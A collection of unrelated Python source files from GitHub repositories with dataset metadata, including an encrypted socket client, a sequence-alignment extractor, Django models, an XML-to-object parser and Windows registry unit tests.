greatabel/PythonRepository | 19,292,993,102,808 | 74258dbd1674fa955c347fa60ea1c4aecd951dfe | 52585c8d95cef15199c18ba1a76899d2c31329f0 | /05PythonCookbook/ch10ModulesAndPackages/i1graphics/primitive/line.py | bdf1a8a1c5a0a9cf408976d0581c424538e85b21 | []
| no_license | https://github.com/greatabel/PythonRepository | c7a952257303a21083ed7d535274c339362bd126 | 836fcdd3f5c1b150122302685104fe51b5ebe1a3 | refs/heads/master | 2023-08-30T15:56:05.376391 | 2023-08-26T03:34:14 | 2023-08-26T03:34:14 | 29,392,599 | 33 | 6 | null | false | 2023-02-14T13:33:21 | 2015-01-17T13:54:58 | 2022-10-31T09:32:22 | 2023-02-14T13:33:20 | 76,526 | 23 | 7 | 9 | Python | false | false | print('I am line.py') | UTF-8 | Python | false | false | 21 | py | 895 | line.py | 620 | 0.666667 | 0.666667 | 0 | 1 | 21 | 21 |
duanzhihua/StudyNote | 11,562,051,998,466 | 9aef358d6208dc7931a5e9f7ea895f39a7b468df | 28a901654360df732be05106a5a7435399b41438 | /pythonWebCrawler/ArticleSpider/main.py | 12cc1829cc9e4058fc35b81205d963ddf5af3971 | []
| no_license | https://github.com/duanzhihua/StudyNote | 39879a9c8c526df0017f12e0d31ebba91d77cec8 | 1e6532a1f5ff5b401bceadf4ec46b3b7e7505668 | refs/heads/master | 2021-09-09T16:32:28.306324 | 2018-03-18T02:26:09 | 2018-03-18T02:26:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from scrapy.cmdline import execute
import sys
import os
def main():
print(os.path.abspath(__file__))
print(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
execute(['scrapy','crawl','jobbole'])
if __name__=='__main__':
main() | UTF-8 | Python | false | false | 300 | py | 179 | main.py | 91 | 0.643333 | 0.643333 | 0 | 10 | 29.1 | 63 |
nwhitehead1/multithreaded-python-sockets | 13,443,247,660,430 | f6c34241dbe651f5b1276859dcff51680656ffd5 | a799b8f0fb8b00ecd31b6170b76ef725c5dece27 | /client.py | 9f054d5805e39498c14f688d93348035e9a9cf59 | []
| no_license | https://github.com/nwhitehead1/multithreaded-python-sockets | 1081070496bb145d59b35906e75d06213c8a4856 | 4a702bad8c56f90cceb057b169a7cd6a70b3543d | refs/heads/master | 2023-08-18T12:04:49.340473 | 2021-10-17T17:05:04 | 2021-10-17T17:05:04 | 213,256,977 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import socket
import sys
import crypto
BUFFER_SIZE = 1024
# File Not Found -> Throw this to end execution on empty server send.
class FileNotFoundException(Exception):
pass
def main():
HOST = sys.argv[1] # Server IP address
PORT = int(sys.argv[2]) # Port used by the server
#HOST = "fd41:c6b6:6e7c:0:b509:1591:9285:587d"
#PORT = 7777
print('[CLIENT] Creating socket...')
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)
s.connect((HOST, PORT, 0, 0))
print('[CLIENT] Connecting to server:', HOST, ' (', PORT, ')')
clientPrivateKey, clientPublicKey = crypto.keyGen()
# Receive public key from server
try:
serverPublicKeyString = s.recv(BUFFER_SIZE).decode('utf-8')
serverPublicKey = crypto.stringToKey(serverPublicKeyString)
except ValueError as ve:
print('[CLIENT] Invalid public key from server:', ve)
s.close()
# Send public key to server
print('[CLIENT] Sending Public Key:\n', crypto.keyToBytes(clientPublicKey))
s.sendall(crypto.keyToBytes(clientPublicKey))
try:
# Request String
byteRequestString = input('[CLIENT] File Name Request: ').encode()
encryptedByteRequestString = crypto.encrypt(byteRequestString, serverPublicKey)
print('[CLIENT] Sending encrypted request:', encryptedByteRequestString)
s.sendall(encryptedByteRequestString)
# Response File
encryptedResponseFile = s.recv(BUFFER_SIZE)
if not encryptedResponseFile:
raise FileNotFoundException()
else:
print('[CLIENT] Receiving encrypted server response:', encryptedResponseFile)
print('[CLIENT] Response received. Writing data to local file...')
try:
decryptedResponseFile = crypto.decrypt(encryptedResponseFile, clientPrivateKey)
f = open('responses/response_file.txt', 'wb')
f.write(decryptedResponseFile)
if f:
f.close()
except:
print('[CLIENT] Unable to write response to file!')
except KeyboardInterrupt:
print('[CLIENT] Closing client socket...')
except FileNotFoundException:
print('[CLIENT] Response not received: The file could not be found.')
finally:
s.close()
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 2,384 | py | 4 | client.py | 3 | 0.641359 | 0.625839 | 0 | 64 | 36.25 | 95 |
marekborowiec/seq_extractor | 7,249,904,803,251 | 7720131eceaa7298f10cfa61a9239a89e6ec6ca0 | 63f55805b743cd72a3cd4b27c5c5d312ffd4f703 | /seq_extractor.py | 9eae13459d89424b613d87a1f1ae222792ba8cdc | []
| no_license | https://github.com/marekborowiec/seq_extractor | 2b0b6b469c83d2b23ec657c5a11ef1ed2f20e6a2 | aac82025ffc1c67b9dd58271c60be7bba43badd7 | refs/heads/master | 2015-08-09T07:57:06 | 2014-01-07T20:04:50 | 2014-01-07T20:04:50 | 13,912,553 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
# seq_extractor.py by Marek Borowiec
# This program reads a multiple sequence alignment (so far only NEXUS supported) and extracts a partition given by user
import sys
from sys import argv
import re
# Throwing an error if no input file is provided
if len(sys.argv) < 2:
print "Use: seq_splitter.py your_filename.extension"
sys.exit()
else:
script, input_file = argv
prompt = "> "
print """Do you wish to extract from all or a particular sequence/taxon?
(options: all/your_taxon_name as in the input file)"""
choose = raw_input(prompt)
print """\nWhat partition do you wish to extract?
Enter range as two integers, for example Start: 1, Stop: 678
Start:"""
first = raw_input(prompt)
start = int(first) - 1
print "Stop:"
last = raw_input(prompt)
stop = int(last) - 1
# Defining nchar for the NEXUS block
nchar = stop - start
print """Write a NEXUS block? (y/n)"""
nexus = raw_input(prompt)
current_file = open(input_file, 'r')
file_read = current_file.readlines()
# Defining output file name if all taxa are extracted
if choose == 'all':
output_file_name = str(first) + '-' + str(last) + '_' + str(input_file)
# Output file name will be prefixed with the taxon name if only one chosen
else:
output_file_name = choose + "_" + str(first) + '-' + str(last) + '_' + str(input_file)
# Gives the option to write to a file or just print to screen
write_output = True
if write_output:
output = open(output_file_name, 'w')
if nexus == 'y':
# Prompts to provide ntax for NEXUS block
if choose == 'all':
print "Number of taxa?"
ntax = int(raw_input(prompt))
# Only one taxon if a name is specified
else:
ntax = 1
# Providing the beginning of NEXUS block
nexus_block_begin = """#NEXUS
Begin data;
Dimensions ntax=%d nchar=%d;
Format datatype=dna symbols="ACTG" missing=? gap=-;
Matrix""" % (ntax, nchar)
# Providing the end of NEXUS block
nexus_block_end = """;
End;"""
if write_output:
output.write(nexus_block_begin + '\n')
line_number = 0
for line in file_read:
# Defining a regex that matches strings with
# taxa and sequences
tax_seq_pattern = '(^|\t)(\S+\s+)([ACGTKMRYSWNBVHD?-]+)(\s|\r\n?|\n)'
# Defining a regex that matches strings with
# chosen taxon and its sequence
chosen_seq_pattern = '(^|\t)(%s\s+)([ACGTKMRYSWNBVHD?-]+)(\s|\r\n?|\n)' % choose
# This will match all taxa and sequence lines
result = re.search(tax_seq_pattern, line)
# This will match only chosen taxon line
taxon_result = re.search(chosen_seq_pattern, line)
if result:
# Getting taxon name and sequence from
# the matched string
taxon = result.group(2)
sequence = result.group(3)
# Defining partition
partition = sequence[start:stop]
# Defining output string
out_string = "%s %s" % (taxon, partition)
if write_output:
if choose == "all":
output.write(out_string + '\n')
else:
if taxon_result:
output.write(out_string + '\n')
line_number += 1
if nexus == 'y':
if write_output:
output.write(nexus_block_end)
print "\nYour file with extracted sequences has been saved as %r\n" % (output_file_name)
current_file.close()
if write_output:
output.close()
| UTF-8 | Python | false | false | 3,179 | py | 2 | seq_extractor.py | 2 | 0.677257 | 0.673482 | 0 | 133 | 22.902256 | 119 |
hamishesham/Companion | 2,233,383,012,766 | 6f008f1fb2eef0b0d1e811644b50cbed10255741 | 6a4c85f492e65b9a67f56ec5ca6a4b5fc59f1e16 | /output.py | 59f8e1ea5590882e68854682f10c4a05222ba0ea | []
| no_license | https://github.com/hamishesham/Companion | e21ea9a64aeb0070c2bec4ff84c0faf8ce8e070a | 80ebfa78ac7e4d39b9a8bfac2e9d7801497bbae4 | refs/heads/master | 2020-03-29T20:07:10.312805 | 2018-09-23T16:39:59 | 2018-09-23T16:39:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | TRAIN_DATA = [
('we are meeting ten thirty a m today', {'entities':[(15, 29, 'TIME'),(30, 35, 'DATE'),]}),
('the boys will meet nine fifty a m tomorrow', {'entities':[(19, 33, 'TIME'),(34, 42, 'DATE'),]}),
('they will be there by one twenty a m', {'entities':[(22, 36, 'TIME'),]}),
] | UTF-8 | Python | false | false | 286 | py | 10 | output.py | 7 | 0.56993 | 0.5 | 0 | 5 | 56.4 | 99 |
jaydee220/PCSII_Sapienza | 3,934,190,071,849 | bf8e23a302376df1102b424422f3a52ae8294667 | f19664bda4bb0fd5d6427ceffeec941ec172af14 | /Ex12.py | d586181dd3c57771317bac7a4cef8b1fce335ab3 | []
| no_license | https://github.com/jaydee220/PCSII_Sapienza | 44b5212a8932fbc9882fc3183cdc4b5b6965b4e1 | 198906ff69c5bc9103c449c71cc70c2b5e6d0f3d | refs/heads/master | 2021-07-21T08:47:28.535596 | 2017-10-31T09:34:32 | 2017-10-31T09:34:32 | 107,376,613 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | classgrades= []
if __name__ == '__main__':
for _ in range(int(input())):
names = input()
scores = float(input())
classgrades.append([names,scores])
gradesonly = list(set(scores for names,scores in classgrades))
gradesonly.sort()
names_lst = list(names for names,scores in classgrades if scores == gradesonly[1])
names_lst.sort()
for name in names_lst:
print (name)
| UTF-8 | Python | false | false | 421 | py | 44 | Ex12.py | 43 | 0.612827 | 0.610451 | 0 | 12 | 34.083333 | 86 |
vanslar/ecggenerator | 14,164,802,156,999 | a7a4819aa9aa0c7218040b9266278f3894ffcd93 | 8df9a0bc66bb63d8d2c31d7dbf04859470cc4b89 | /genEcg.py | db97dd02fd07fc29a9f93f32b8fdffceb372c404 | []
| no_license | https://github.com/vanslar/ecggenerator | b00607b076980baa2ee9155d7fa3f109b7413cde | adc8701105271b465baf7481ca4c84859f656215 | refs/heads/master | 2020-06-05T06:32:36.103693 | 2019-06-21T11:38:02 | 2019-06-21T11:38:02 | 192,346,078 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
#import modelCharRnn
import modelV3 as model
import wfdb
import tensorflow as tf
import matplotlib.pyplot as plt
sig, field = wfdb.rdsamp('Data/1201_5')
#data = sig[:, 0]
data = sig[:, 0]
pre_data = data[18750:18750+1000]
batch_count = 1
#seq_length = field['fs']*3
seq_length = field['fs']*2
feature_length = field['fs']*2
#Model = model.EcgGenerator_CharRnn(128, 2, batch_count, seq_length, 0.001, 0.5)
#Model = model.EcgGenerator(128, 2, batch_count, seq_length, 0.001, 0.5, 1000)
Model = model.EcgGenerator(128,feature_length, 2, batch_count, seq_length, 0.001, 0.5, 1)
Model.load(tf.train.latest_checkpoint('./models'))
result = Model.eval(10000, pre_data)
with open('result.txt', 'w') as fid:
for i in result:
fid.write(str(i)+'\n')
plt.plot(result)
plt.show() | UTF-8 | Python | false | false | 801 | py | 5 | genEcg.py | 4 | 0.689139 | 0.606742 | 0 | 29 | 26.655172 | 89 |
zhuoxiaojian/SemSupport | 13,125,420,094,266 | c5c4b599f9fff00125c54cc7cb2a7ee3b3b35869 | 0a94e12fc91815bdf510d748f37fdfccabe8c9d4 | /apps/citys/models.py | 71a911d9f579a5eeb0771ebec775179d0f2355b7 | []
| no_license | https://github.com/zhuoxiaojian/SemSupport | 0cb47e2612373b90e4a6b95165bc39d49a9bd0ac | 4dd4582c03daf43b589298c6061846d40aa3666f | refs/heads/master | 2022-12-23T15:18:35.411711 | 2019-09-26T12:16:08 | 2019-09-26T12:16:08 | 129,690,135 | 1 | 0 | null | false | 2022-12-07T23:51:23 | 2018-04-16T05:38:27 | 2020-07-30T12:51:39 | 2022-12-07T23:51:21 | 5,004 | 0 | 0 | 18 | JavaScript | false | false | from django.db import models
# Create your models here.
class FormRegionCity(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='城市')
class Meta:
db_table = 'ys_city'
verbose_name = '城市信息'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Area(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='地区')
class Meta:
db_table = 'ys_area_list'
verbose_name = '地区列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Province(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='省份')
area = models.ForeignKey(Area, default=None, null=True, on_delete=models.SET_NULL, verbose_name='所属地区')
class Meta:
db_table = 'ys_province_list'
verbose_name = '省份列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class City(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='城市')
province = models.ForeignKey(Province, verbose_name='所属省份', default=None, null=True, on_delete=models.SET_NULL)
class Meta:
db_table = 'ys_city_list'
verbose_name = '城市列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
| UTF-8 | Python | false | false | 1,462 | py | 79 | models.py | 73 | 0.638054 | 0.629471 | 0 | 49 | 27.530612 | 115 |
Sishan/LeetCode | 1,417,339,219,433 | e3340a51ef78dddf37c0e445b9896030d7376aa3 | 4d49d1665f6f385c08f292b728da6eba563ee400 | /Easy/RemoveElement.py | 874638fd228808957e45f6c9968c5d084e734fa8 | []
| no_license | https://github.com/Sishan/LeetCode | 4ac3c10cd65e395be68e66d0cb1f26d8ac0f5ea0 | 8c2f4af2fd30ca93daca8f7007b41e1f33c8f147 | refs/heads/master | 2020-05-22T01:39:09.459822 | 2020-01-24T05:32:19 | 2020-01-24T05:32:19 | 57,013,043 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Given an array and a value, remove all instances of that value in place and return the new length.
Do not allocate extra space for another array, you must do this in place with constant memory.
The order of elements can be changed. It doesn't matter what you leave beyond the new length.
"""
class Solution(object):
def removeElement(self, nums, val):
"""
:type nums: List[int]
:type val: int
:rtype: int
"""
if (nums == None):
return 0
count = 0
for x in xrange(len(nums)):
if (nums[i] != val):
nums[count] = nums[i]
count += 1
return count
| UTF-8 | Python | false | false | 694 | py | 228 | RemoveElement.py | 217 | 0.56196 | 0.557637 | 0 | 23 | 27.826087 | 98 |
batterseapower/untangle | 7,902,739,869,091 | 45ecd6ab8cdec114739384a89805a0f641d0061b | 1504eac0717a76250379f5d2507e4d3664dc134d | /untangle.py | 31f28cc56c66a3b243154a1a12a2cccf0d06596e | [
"MIT"
]
| permissive | https://github.com/batterseapower/untangle | 81f91b1a15627e8c127f763636685b147636c78d | 0a3830a6f25f1b64044ae6f60f61c72a5a751e77 | refs/heads/master | 2021-01-22T01:10:27.435685 | 2017-09-02T14:10:24 | 2017-09-02T14:10:24 | 102,200,796 | 0 | 0 | null | true | 2017-09-02T14:07:25 | 2017-09-02T14:07:25 | 2017-08-30T08:20:43 | 2017-07-31T18:37:06 | 111 | 0 | 0 | 0 | null | null | null | #!/usr/bin/env python
"""
untangle
Converts xml to python objects.
The only method you need to call is parse()
Partially inspired by xml2obj
(http://code.activestate.com/recipes/149368-xml2obj/)
Author: Christian Stefanescu (http://0chris.com)
License: MIT License - http://www.opensource.org/licenses/mit-license.php
"""
import os
import sys
import keyword
import errno
from xml.sax import make_parser, handler
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
from types import StringTypes
def is_string(x):
return isinstance(x, StringTypes)
except ImportError:
def is_string(x):
return isinstance(x, str)
__version__ = '1.1.1'
class Element(object):
"""
Representation of an XML element.
"""
def __init__(self, name, attributes):
self._name = name
self._attributes = attributes
self.children = []
self.is_root = False
self.cdata = ''
def add_child(self, element):
"""
Store child elements.
"""
self.children.append(element)
def add_cdata(self, cdata):
"""
Store cdata
"""
self.cdata = self.cdata + cdata
def get_attribute(self, key):
"""
Get attributes by key
"""
return self._attributes.get(key)
def get_elements(self, name=None):
"""
Find a child element by name
"""
if name:
return [e for e in self.children if e._name == name]
else:
return self.children
def __getitem__(self, key):
return self.get_attribute(key)
def __getattr__(self, key):
matching_children = [x for x in self.children if x._name == key]
if matching_children:
if len(matching_children) == 1:
self.__dict__[key] = matching_children[0]
return matching_children[0]
else:
self.__dict__[key] = matching_children
return matching_children
else:
raise AttributeError(
"'%s' has no attribute '%s'" % (self._name, key)
)
def __hasattribute__(self, name):
if name in self.__dict__:
return True
return any(self.children, lambda x: x._name == name)
def __iter__(self):
yield self
def __str__(self):
return (
"Element <%s> with attributes %s, children %s and cdata %s" %
(self._name, self._attributes, self.children, self.cdata)
)
def __repr__(self):
return (
"Element(name = %s, attributes = %s, cdata = %s)" %
(self._name, self._attributes, self.cdata)
)
def __nonzero__(self):
return self.is_root or self._name is not None
def __eq__(self, val):
return self.cdata == val
def __dir__(self):
children_names = [x._name for x in self.children]
return children_names
def __len__(self):
return len(self.children)
def __contains__(self, key):
return key in dir(self)
class Handler(handler.ContentHandler):
"""
SAX handler which creates the Python object structure out of ``Element``s
"""
def __init__(self):
self.root = Element(None, None)
self.root.is_root = True
self.elements = []
def startElement(self, name, attributes):
name = name.replace('-', '_')
name = name.replace('.', '_')
name = name.replace(':', '_')
# adding trailing _ for keywords
if keyword.iskeyword(name):
name += '_'
attrs = dict()
for k, v in attributes.items():
attrs[k] = v
element = Element(name, attrs)
if len(self.elements) > 0:
self.elements[-1].add_child(element)
else:
self.root.add_child(element)
self.elements.append(element)
def endElement(self, name):
self.elements.pop()
def characters(self, cdata):
self.elements[-1].add_cdata(cdata)
def parse(filename, **parser_features):
"""
Interprets the given string as a filename, URL or XML data string,
parses it and returns a Python object which represents the given
document.
Extra arguments to this function are treated as feature values to pass
to ``parser.setFeature()``. For example, ``feature_external_ges=False``
will set ``xml.sax.handler.feature_external_ges`` to False, disabling
the parser's inclusion of external general (text) entities such as DTDs.
Raises ``ValueError`` if the first argument is None / empty string.
Raises ``AttributeError`` if a requested xml.sax feature is not found in
``xml.sax.handler``.
Raises ``xml.sax.SAXParseException`` if something goes wrong
during parsing.
"""
if (filename is None or (is_string(filename) and filename.strip()) == ''):
raise ValueError('parse() takes a filename, URL or XML string')
parser = make_parser()
for feature, value in parser_features.items():
parser.setFeature(getattr(handler, feature), value)
sax_handler = Handler()
parser.setContentHandler(sax_handler)
if (is_pathname_valid(filename) and os.path.exists(filename)) or (is_string(filename) and is_url(filename)):
parser.parse(filename)
else:
if hasattr(filename, 'read'):
parser.parse(filename)
else:
parser.parse(StringIO(filename))
return sax_handler.root
# Originally based on https://stackoverflow.com/questions/9532499/check-whether-a-path-is-valid-in-python-without-creating-a-file-at-the-paths-ta/34102855#34102855
def is_pathname_valid(pathname):
'''
`True` if the passed pathname is a valid pathname for the current OS;
`False` otherwise.
'''
# If this pathname is either not a string or is but is empty, this pathname
# is invalid.
# Sadly, Python fails to provide the following magic number for us.
ERROR_INVALID_NAME = 123
'''
Windows-specific error code indicating an invalid pathname.
See Also
----------
https://msdn.microsoft.com/en-us/library/windows/desktop/ms681382%28v=vs.85%29.aspx
Official listing of all such codes.
'''
try:
if not is_string(pathname) or not pathname:
return False
# Strip this pathname's Windows-specific drive specifier (e.g., `C:\`)
# if any. Since Windows prohibits path components from containing `:`
# characters, failing to strip this `:`-suffixed prefix would
# erroneously invalidate all valid absolute Windows pathnames.
_, pathname = os.path.splitdrive(pathname)
# Directory guaranteed to exist. If the current OS is Windows, this is
# the drive to which Windows was installed (e.g., the "%HOMEDRIVE%"
# environment variable); else, the typical root directory.
root_dirname = os.environ.get('HOMEDRIVE', 'C:') \
if sys.platform == 'win32' else os.path.sep
assert os.path.isdir(root_dirname) # ...Murphy and her ironclad Law
# Append a path separator to this directory if needed.
root_dirname = root_dirname.rstrip(os.path.sep) + os.path.sep
# Test whether each path component split from this pathname is valid or
# not, ignoring non-existent and non-readable path components.
for pathname_part in pathname.split(os.path.sep):
try:
os.lstat(root_dirname + pathname_part)
# If an OS-specific exception is raised, its error code
# indicates whether this pathname is valid or not. Unless this
# is the case, this exception implies an ignorable kernel or
# filesystem complaint (e.g., path not found or inaccessible).
#
# Only the following exceptions indicate invalid pathnames:
#
# * Instances of the Windows-specific "WindowsError" class
# defining the "winerror" attribute whose value is
# "ERROR_INVALID_NAME". Under Windows, "winerror" is more
# fine-grained and hence useful than the generic "errno"
# attribute. When a too-long pathname is passed, for example,
# "errno" is "ENOENT" (i.e., no such file or directory) rather
# than "ENAMETOOLONG" (i.e., file name too long).
# * Instances of the cross-platform "OSError" class defining the
# generic "errno" attribute whose value is either:
# * Under most POSIX-compatible OSes, "ENAMETOOLONG".
# * Under some edge-case OSes (e.g., SunOS, *BSD), "ERANGE".
except OSError as exc:
if hasattr(exc, 'winerror'):
if exc.winerror == ERROR_INVALID_NAME:
return False
elif exc.errno in {errno.ENAMETOOLONG, errno.ERANGE}:
return False
except ValueError:
# Python throws its own exceptions if a path isn't valid in some cases, e.g. e.g. 'path too long for Windows':
# https://github.com/python/cpython/blob/3.6/Modules/posixmodule.c#L929
return False
# If a "TypeError" exception was raised, it almost certainly has the
# error message "embedded NUL character" indicating an invalid pathname.
except TypeError as exc:
return False
# If no exception was raised, all path components and hence this
# pathname itself are valid. (Praise be to the curmudgeonly python.)
else:
return True
# If any other exception was raised, this is an unrelated fatal issue
# (e.g., a bug). Permit this exception to unwind the call stack.
#
# Did we mention this should be shipped with Python already?
def is_url(string):
"""
Checks if the given string starts with 'http(s)'.
"""
try:
return string.startswith('http://') or string.startswith('https://')
except AttributeError:
return False
# vim: set expandtab ts=4 sw=4:
| UTF-8 | Python | false | false | 10,153 | py | 1 | untangle.py | 1 | 0.606323 | 0.599921 | 0 | 296 | 33.300676 | 163 |
chiaradinardo/algoritmos-I-FIUBA | 18,545,668,804,472 | 0c4050187026958d89c3945b3db544f23d2e49a3 | 444fa16e7463e8b5c828bbaea4ced1253cc0ed13 | /TP3/pilas_colas.py | 82d2743b93b0e9a62549f1326ac6c38bfdde2193 | []
| no_license | https://github.com/chiaradinardo/algoritmos-I-FIUBA | adb1e377918b9535ec46500fbcd20836ea470f5c | afae33a4296d2d04fde754c7363cf471bc7b45a7 | refs/heads/master | 2023-05-14T19:20:05.018533 | 2021-06-09T15:32:36 | 2021-06-09T15:32:36 | 290,336,937 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Clase del 27/10/2019.
'''
class Pila:
'''
Representa una pila con operaciones de apilar, desapilar y
verificar si está vacía.
'''
def __init__(self):
'''
Crea una pila vacía.
'''
self.items = []
def esta_vacia(self):
'''
Devuelve True si la lista está vacía, False si no.
'''
return len(self.items) == 0
def apilar(self, x):
'''
Apila un elemento en la pila.
'''
self.items.append(x)
def desapilar(self):
'''
Devuelve el elemento tope y lo elimina de la pila.
Si la pila está vacía levanta una excepción.
'''
if self.esta_vacia():
raise IndexError("La pila está vacía")
return self.items.pop()
# Este método está para simplificar las pruebas
def apilar_muchos(self, iterable):
'''
Apila todos los elementos del iterable en la pila.
'''
for elem in iterable:
self.apilar(elem)
# Este método está para simplificar las pruebas
def __str__(self):
'''
Devuelve una representación de la pila en la forma:
| e1, e2, ..., <TOPE
'''
return '| ' + ', '.join(map(str, self.items)) + ' <TOPE'
def __iter__(self):
return iter(self.items)
def ver_tope(self):
if self.esta_vacia():
raise IndexError("¡Pila vacía!")
return self.items[-1]
| UTF-8 | Python | false | false | 1,490 | py | 10 | pilas_colas.py | 5 | 0.527495 | 0.519348 | 0 | 60 | 23.533333 | 64 |
BodenmillerGroup/bbwidgets | 10,350,871,230,746 | 8b69a7ee222912fd63659ebb1ecfd930a117d96a | 684b46b1e1d6a9e4c6fb579eeba548a653f55484 | /setup.py | db9f8581cb9d2a981327642817205c2d7c859cde | [
"MIT"
]
| permissive | https://github.com/BodenmillerGroup/bbwidgets | de092ef528a828255a7d6f357a0b1560a4b5d249 | 9ce5867b19868baae16b5690a4c3d1c7b9267b74 | refs/heads/master | 2020-05-29T21:46:11.928149 | 2019-06-03T11:24:11 | 2019-06-03T11:24:11 | 189,392,083 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from setuptools import setup
with open('README.md', 'r') as f:
long_description = f.read()
setup(
name='bbwidgets',
version='0.1.1',
packages=['bbwidgets'],
url='https://github.com/BodenmillerGroup/bbwidgets',
license='MIT',
author='Jonas Windhager',
author_email='jonas.windhager@uzh.ch',
description='Interactive Widgets for the Jupyter Notebook',
long_description=long_description,
long_description_content_type='text/markdown',
install_requires=['ipywidgets', 'matplotlib', 'numpy', 'traitlets', 'traittypes'],
classifiers=[
'Framework :: Jupyter',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
]
)
| UTF-8 | Python | false | false | 770 | py | 4 | setup.py | 3 | 0.650649 | 0.645455 | 0 | 25 | 29.8 | 86 |
Infinidat/infi.registry | 1,949,915,166,276 | 3b5dc1e4e8fa3e0fb33aff0ad1ee275c17a49a41 | 1e29869aca0233c33a99321c48cafa50c34c0a07 | /src/infi/registry/interface/tests.py | 6370bba9810d190026deee02431128495661fe50 | [
"BSD-3-Clause"
]
| permissive | https://github.com/Infinidat/infi.registry | 00d3d09073c6106faee63b932b1e40df22d907f4 | 9ad1a17625c30c37c0f32641e0e8f837446f9d77 | refs/heads/master | 2023-05-27T02:25:23.125253 | 2019-02-18T11:23:14 | 2019-02-18T11:23:14 | 4,346,622 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
import logging
import unittest
import mock
import os
from .. import interface, constants, dtypes, errors, funcs, c_api
from ..dtypes import LPWSTR, LPCWSTR
class BaseTestCase(unittest.TestCase):
def _get_tested_function(self):
return getattr(interface, self.__class__.__name__, None)
def _get_tested_api_function(self):
return getattr(c_api, self.__class__.__name__, None) or \
getattr(c_api, '%sW' % self.__class__.__name__) or \
False
def setUp(self):
if os.name != 'nt':
raise unittest.SkipTest
if not self._get_tested_api_function().is_available_on_this_platform():
raise unittest.SkipTest
def tearDown(self):
pass
def _assert_func_raises(self, exception, kwargs):
self.assertRaises(exception, self._get_tested_function(), **kwargs)
def _test_base_exception(self, kwargs, expected_exception):
api_function = self._get_tested_api_function()
@mock.patch("infi.registry.c_api.%s" % api_function.__name__)
def _test(mocked_api_function):
mocked_api_function.side_effect = WindowsError(-1)
self._assert_func_raises(expected_exception, kwargs)
_test()
class RegCloseKey(BaseTestCase):
def test_invalid_key_1(self):
kwargs = {'key': 0}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_invalid_key_2(self):
kwargs = {'key': 4000}
self._assert_func_raises(errors.InvalidHandleException, kwargs)
def test_valid_close(self):
open_key = self._get_open_key()
self.assertEqual(None, interface.RegCloseKey(open_key))
def _get_open_key(self):
raise unittest.SkipTest
HKLM = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
return interface.RegCreateKeyEx(HKLM, 'SOFTWARE')
def test_double_close(self):
open_key = self._get_open_key()
self.assertEqual(None, interface.RegCloseKey(open_key))
self.assertEqual(None, interface.RegCloseKey(open_key))
def test_base_exception(self):
kwargs = {'key':-1}
self._test_base_exception(kwargs, errors.CloseKeyFailed)
class RegConnectRegistry(BaseTestCase):
def test_invalid_local_key(self):
kwargs = {'machineName': None,
'key': 0}
self._assert_func_raises(ValueError, kwargs)
def test_invalid_remote_key(self):
kwargs = {'machineName': 'remoteComputer',
'key': constants.HKEY_CURRENT_USER}
self._assert_func_raises(ValueError, kwargs)
@mock.patch("infi.registry.c_api.RegConnectRegistryW")
def test_valid_remote_keys(self, mocked_function):
mocked_function.return_value = None
kwargs = {'machineName': 'remoteComputer'}
for key in [constants.HKEY_LOCAL_MACHINE, constants.HKEY_USERS]:
kwargs['key'] = key
self.assertEqual(None, interface.RegConnectRegistry(**kwargs))
self.assertEqual(2, mocked_function.call_count)
@mock.patch("infi.registry.c_api.RegConnectRegistryW")
def test_valid_local_keys(self, mocked_function):
mocked_function.return_value = None
kwargs = {'machineName': None}
for key in [constants.HKEY_LOCAL_MACHINE, constants.HKEY_USERS, constants.HKEY_CURRENT_CONFIG,
constants.HKEY_CURRENT_USER, constants.HKEY_CLASSES_ROOT]:
kwargs['key'] = key
self.assertEqual(None, interface.RegConnectRegistry(**kwargs))
self.assertEqual(5, mocked_function.call_count)
def test_connect_to_local_machine(self):
key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
self.assertGreater(key, 0)
def test_connect_to_remote_machine(self):
import socket
key = interface.RegConnectRegistry(r'\\%s' % socket.gethostname(), constants.HKEY_LOCAL_MACHINE)
self.assertGreater(key, 0)
def test_connect_to_invalid_remote(self):
kwargs = {'machineName': r'\\0.0.0.0',
'key': constants.HKEY_LOCAL_MACHINE}
self._assert_func_raises(errors.RemoteRegistryConnectionFailed, kwargs)
def test_base_exception(self):
kwargs = {'machineName':None, 'key':constants.HKEY_LOCAL_MACHINE}
self._test_base_exception(kwargs, errors.ConnectRegistryFailed)
class TestCaseLocalMachine(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
def tearDown(self):
interface.RegCloseKey(self.key)
BaseTestCase.tearDown(self)
class RegFlushKey(BaseTestCase):
def test_flush_key(self):
self.key = interface.RegConnectRegistry(None, constants.HKEY_LOCAL_MACHINE)
self.key = interface.RegCreateKeyEx(self.key, 'SOFTWARE')
interface.RegFlushKey(self.key)
interface.RegCloseKey(self.key)
def test_base_exception(self):
kwargs = {'key':-1}
